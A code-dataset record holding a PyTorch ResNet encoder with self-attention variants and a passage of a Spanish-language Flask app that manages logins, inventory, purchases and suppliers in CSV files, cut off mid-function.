Malta-Lab/IUPE
|
44ddf119917538f02bb69509fec7a8314eed419f
|
[
"MIT"
] | 10
|
2020-08-14T00:39:39.000Z
|
2021-04-07T02:51:01.000Z
|
models/general/resnet.py
|
Malta-Lab/IUPE
|
44ddf119917538f02bb69509fec7a8314eed419f
|
[
"MIT"
] | 4
|
2020-08-13T14:07:48.000Z
|
2022-03-12T00:46:15.000Z
|
models/general/resnet.py
|
Malta-Lab/IUPE
|
44ddf119917538f02bb69509fec7a8314eed419f
|
[
"MIT"
] | 2
|
2020-08-17T14:38:54.000Z
|
2020-10-03T02:18:39.000Z
|
from copy import deepcopy
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from .attention import Self_Attn2D
def normalize_imagenet(x):
''' Normalize input images according to ImageNet standards.
Args:
x (tensor): input images
'''
x = x.clone()
x[:, 0] = (x[:, 0] - 0.485) / 0.229
x[:, 1] = (x[:, 1] - 0.456) / 0.224
x[:, 2] = (x[:, 2] - 0.406) / 0.225
return x
def create_resnet(type):
if type == 'resnet':
return Resnet
elif type =='attention-first':
return ResnetFirst
elif type == 'attention-last':
return ResnetLast
elif type == 'attention-all':
return ResnetAll
class Resnet(nn.Module):
r''' ResNet encoder network for image input.
Args:
c_dim (int): output dimension of the latent embedding
normalize (bool): whether the input images should be normalized
'''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x = self.features.layer2(x) # 128
x = self.features.layer3(x) # 256
x = self.features.layer4(x) # 512
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
class ResnetFirst(nn.Module):
r''' ResNet encoder network for image input.
Args:
c_dim (int): output dimension of the latent embedding
normalize (bool): whether the input images should be normalized
'''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
self.att = Self_Attn2D(64)
self.att2 = Self_Attn2D(128)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x, _ = self.att(x)
x = self.features.layer2(x) # 128
x, _ = self.att2(x)
x = self.features.layer3(x) # 256
x = self.features.layer4(x) # 512
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
class ResnetLast(nn.Module):
r''' ResNet encoder network for image input.
Args:
c_dim (int): output dimension of the latent embedding
normalize (bool): whether the input images should be normalized
'''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
self.att3 = Self_Attn2D(256)
self.att4 = Self_Attn2D(512)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x = self.features.layer2(x) # 128
x = self.features.layer3(x) # 256
x, _ = self.att3(x)
x = self.features.layer4(x) # 512
x, _ = self.att4(x)
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
class ResnetAll(nn.Module):
r''' ResNet encoder network for image input.
Args:
c_dim (int): output dimension of the latent embedding
normalize (bool): whether the input images should be normalized
'''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
self.att = Self_Attn2D(64)
self.att2 = Self_Attn2D(128)
self.att3 = Self_Attn2D(256)
self.att4 = Self_Attn2D(512)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x, _ = self.att(x)
x = self.features.layer2(x) # 128
x, _ = self.att2(x)
x = self.features.layer3(x) # 256
x, _ = self.att3(x)
x = self.features.layer4(x) # 512
x, _ = self.att4(x)
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
| 26.61828
| 71
| 0.577863
| 645
| 4,951
| 4.344186
| 0.148837
| 0.078515
| 0.167024
| 0.1399
| 0.825482
| 0.825482
| 0.825482
| 0.825482
| 0.825482
| 0.825482
| 0
| 0.047923
| 0.304585
| 4,951
| 186
| 72
| 26.61828
| 0.765902
| 0.17855
| 0
| 0.762295
| 0
| 0
| 0.012192
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081967
| false
| 0
| 0.057377
| 0
| 0.245902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8b5662ba5a62810eb631e072436a4c755f4dd55
| 41,411
|
py
|
Python
|
app.py
|
solilsan/Python3_SGE
|
f74eaeafa425a4107c35e70c3ba4019492f9a9fc
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
solilsan/Python3_SGE
|
f74eaeafa425a4107c35e70c3ba4019492f9a9fc
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
solilsan/Python3_SGE
|
f74eaeafa425a4107c35e70c3ba4019492f9a9fc
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask, request, session, render_template
import json, csv, os, datetime
#iniciando app para la redirección de html.
app = Flask(__name__)
app.secret_key = 'esto-es-una-clave-muy-secreta' #encriptar session.
@app.errorhandler(404)
def page_not_found(e):
#hola
if 'loginC' in session:
if session['loginC']:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.errorhandler(405)
def method_not_allowed(e):
if 'loginC' in session:
if session['loginC']:
return render_template('inventario.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
#Redirección a /index.html.
@app.route('/index.html')
def index():
#Comprobamos si existe la session 'loginC'.
#Si existe comprobamos si es True o False, si es True cargamos la página.
#Si no exite la creamos en False y hacemos una redirección a index.html.
if 'loginC' in session:
if session['loginC']:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
#Redirección a /inicio.html.
@app.route('/inicio.html')
def inicio():
#Comprobamos si 'loginC' es True
if session['loginC']:
return render_template('inicio.html')
else:
return render_template('index.html')
@app.route('/login', methods=['POST'])
def signUpUser():
#Abrimos el archivo listaUsuarios.csv y comprobamos si esta el usuario
session['loginC'] = False
with open(os.getcwd()+'/Python3_SGE/datos/listaUsuarios.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader:
if row[1] == request.form['username'] and row[2] == request.form['password']:
session['idUser'] = row[0]
session['loginC'] = True
if session['loginC']:
return json.dumps(1);
else:
return json.dumps(0);
@app.route('/logout', methods=['POST'])
def logoutUser():
if session['loginC']:
session['loginC'] = False
return json.dumps(1);
else:
return json.dumps(0);
#Redireccion a /inventario.html
@app.route('/inventario.html')
def inventario():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "1":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('inventario.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
#Cargar la lista de los productos
@app.route('/cargarInventario', methods=['POST'])
def cargarInventario():
datos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as File:
readercp = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
datos = list(readercp)
del datos[0] #Eliminar la primera linea de datos, para que no devulva los titulos.
return json.dumps({'datos':datos})
#Borrar un producto seleccionado
@app.route('/borrarInventario', methods=['POST'])
def borrarInventario():
idInventario = request.form['idInventario']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idInventario: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
#Crear un producto
@app.route('/crearProducto', methods=['POST'])
def crearProducto():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, dialect='unix', delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
nombre = request.form['nombreP']
tipo = request.form['tipoP']
cantidad = request.form['contidadP']
precioCompra = str(request.form['precioCompraP']) + "$"
precioVenta = str(request.form['precioVentaP']) + "$"
controles = '<button onclick="modificar({})" class="btn btn btn-outline-warning" type="button">Modificar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'NOMBRE': nombre, "TIPO": tipo, "CANTIDAD": cantidad, "PRECIO_COMPRA": precioCompra, "PRECIO_VENTA": precioVenta, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
return json.dumps(1);
#Cargar datos de un produto seleccionado
@app.route('/verProducto', methods=['POST'])
def verProducto():
idInventario = request.form['idInventario']
datosP = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowvp["ID"] == idInventario: #Añadimos los datos del elemento seleccionado(id) a la lista
datosP.append(rowvp['ID'])
datosP.append(rowvp['NOMBRE'])
datosP.append(rowvp['TIPO'])
datosP.append(rowvp['CANTIDAD'])
datosP.append(rowvp['PRECIO_COMPRA'][:-1])
datosP.append(rowvp['PRECIO_VENTA'][:-1])
return json.dumps({'datos':datosP}) #Devolvemos los datos en forma json
#Modificar datos de un producto seleccionado
@app.route('/actualizarProducto', methods=['POST'])
def actualizarProducto():
precioCompra = request.form['precioCompraAP']
precioVenta = request.form['precioVentaAP']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowacp["ID"] == request.form['idAP']: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['NOMBRE'] = request.form['nombreAP']
rowacp['TIPO'] = request.form['tipoAP']
rowacp['CANTIDAD'] = request.form['contidadAP']
rowacp['PRECIO_COMPRA'] = str(precioCompra) + "$"
rowacp['PRECIO_VENTA'] = str(precioVenta) + "$"
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'TIPO': rowacp['TIPO'], 'CANTIDAD': rowacp['CANTIDAD'], 'PRECIO_COMPRA': rowacp['PRECIO_COMPRA'], 'PRECIO_VENTA': rowacp['PRECIO_VENTA'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
return json.dumps(1);
@app.route('/compras.html')
def compras():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "2":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('compras.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
#Cargar la lista de los productos
@app.route('/cargarCompras', methods=['POST'])
def cargarCompras():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
index += 1
if index == 7:
index = 0
if index == 2:
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarI]
datos.append(rowlp[1])
if index == 3:
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarP]
datos.append(rowlp[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/selectInventario', methods=['POST'])
def selectInventario():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
datos.append(rowlc[0])
datos.append(rowlc[1])
datos.append(rowlc[4])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/selectProveedor', methods=['POST'])
def selectProveedor():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
datos.append(rowlc[0])
datos.append(rowlc[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/crearCompra', methods=['POST'])
def crearCompra():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
producto = request.form['sProductos']
proveedor = request.form['sProveedor']
cantidad = str(request.form['cantidadCP'])
precio = str(request.form['precioCP']) + "$"
total = str(request.form['totalCP']) + "$"
controles = '<button onclick="comprar({})" class="btn btn btn-outline-warning" type="button">Comprar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'PRODUCTO': producto, "PROVEEDOR": proveedor, "CANTIDAD": cantidad, "PRECIO": precio, "TOTAL": total, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaCompras.csv')
return json.dumps(1);
@app.route('/borrarCompra', methods=['POST'])
def borrarCompra():
idCompra = request.form['idCompra']
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idCompra: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaCompras.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/comprarCompra', methods=['POST'])
def comprarCompra():
ridCompra = request.form['idCompra']
rproducto = ""
rproveedor = ""
rcantidad = ""
rprecio = ""
rtotal = ""
rproductoNombre = ""
now = datetime.datetime.now()
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == ridCompra:
rproducto = rowvp['PRODUCTO']
rproveedor = rowvp['PROVEEDOR']
rcantidad = rowvp['CANTIDAD']
rprecio = rowvp['PRECIO']
rtotal = rowvp['TOTAL']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == rproducto:
rproductoNombre = rowvp['NOMBRE']
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "DATE", "NOMBREP"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
producto = rproducto
proveedor = rproveedor
cantidad = rcantidad
precio = rprecio
total = rtotal
date = (str(now.day) + "/" + str(now.month) + "/" + str(now.year))
nombrep = rproductoNombre.capitalize()
data = {'ID': ID, 'PRODUCTO': producto, "PROVEEDOR": proveedor, "CANTIDAD": cantidad, "PRECIO": precio, "TOTAL": total, "DATE": date, "NOMBREP": nombrep}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv')
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, delimiter=";"):
if rowacp["ID"] == rproducto: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['CANTIDAD'] = int(rowacp['CANTIDAD']) + int(rcantidad)
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'TIPO': rowacp['TIPO'], 'CANTIDAD': rowacp['CANTIDAD'], 'PRECIO_COMPRA': rowacp['PRECIO_COMPRA'], 'PRECIO_VENTA': rowacp['PRECIO_VENTA'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, delimiter=";"):
if rowbp["ID"] != ridCompra: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaCompras.csv')
return json.dumps(1);
@app.route('/historicoCompras.html')
def historicoCompras():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "1":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('historicoCompras.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarHistorialCompras', methods=['POST'])
def cargarHistorialCompras():
idProducto = 1
listaDatos = []
cantidad = 0
index = 0
with open(os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
if len(listaDatos) == 0:
datos.append(rowlc[1])
datos.append(rowlc[3])
datos.append(rowlc[4])
datos.append(rowlc[5])
datos.append(rowlc[6][3:-5])
datos.append(rowlc[7])
listaDatos.append(datos)
else:
if listaDatos[index][0] == rowlc[1] and listaDatos[index][4] == rowlc[6][3:-5]:
listaDatos[index][1] = str(int(listaDatos[index][1]) + int(rowlc[3]))
else:
datos.append(rowlc[1])
datos.append(rowlc[3])
datos.append(rowlc[4])
datos.append(rowlc[5])
datos.append(rowlc[6][3:-5])
datos.append(rowlc[7])
listaDatos.append(datos)
index += 1
return json.dumps({'datos':listaDatos})
@app.route('/proveedor.html')
def proveedor():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "2":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('proveedor.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarProveedores', methods=['POST'])
def cargarProveedores():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/newProveedor', methods=['POST'])
def crearProveedor():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, dialect='unix', delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
nombre = request.form['nombreProveedor']
direccion = request.form['calleProveedor']
telefono = request.form['telefonoProveedor']
controles = '<button onclick="modificar({})" class="btn btn btn-outline-warning" type="button">Modificar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'NOMBRE': nombre, "DIRECCION": direccion, "TELEFONO": telefono, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
return json.dumps(1);
@app.route('/borrarProveedor', methods=['POST'])
def borrarProveedor():
idProveedor = request.form['idProveedor']
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idProveedor: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/verProveedor', methods=['POST'])
def verProveedor():
idProveedor = request.form['idProveedor']
datosP = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowvp["ID"] == idProveedor: #Añadimos los datos del elemento seleccionado(id) a la lista
datosP.append(rowvp['ID'])
datosP.append(rowvp['NOMBRE'])
datosP.append(rowvp['DIRECCION'])
datosP.append(rowvp['TELEFONO'])
return json.dumps({'datos':datosP}) #Devolvemos los datos en forma json
@app.route('/actualizarProveedor', methods=['POST'])
def actualizarProveedor():
